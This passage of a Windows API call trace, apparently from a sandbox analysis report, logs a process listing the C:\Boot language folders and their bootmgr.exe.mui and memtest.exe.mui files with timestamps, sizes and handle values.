ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0197.225] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045f8 [0197.226] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.226] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.226] FindNextFileW (in: hFindFile=0x6045f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.226] FindClose (in: hFindFile=0x6045f8 | out: hFindFile=0x6045f8) returned 1 [0197.226] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.226] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0197.226] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.226] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.226] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.227] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.227] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.227] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.227] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.227] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0197.227] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0197.228] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.228] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.228] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.228] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.228] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0197.228] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.228] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0197.229] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045b8 [0197.229] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.229] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.229] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.230] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.230] FindClose (in: hFindFile=0x6045b8 | out: hFindFile=0x6045b8) returned 1 [0197.230] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.230] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0197.230] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604378 [0197.651] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.651] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.651] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.651] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.651] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0197.651] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.652] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0197.652] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604578 [0197.652] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.652] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.652] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.652] FindClose (in: hFindFile=0x604578 | out: hFindFile=0x604578) returned 1 [0197.652] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.652] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0197.652] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045b8 [0197.653] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.653] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.653] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.654] FindClose (in: hFindFile=0x6045b8 | out: hFindFile=0x6045b8) returned 1 [0197.654] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.654] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0197.654] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0197.654] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604438 [0197.655] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.655] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.655] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, 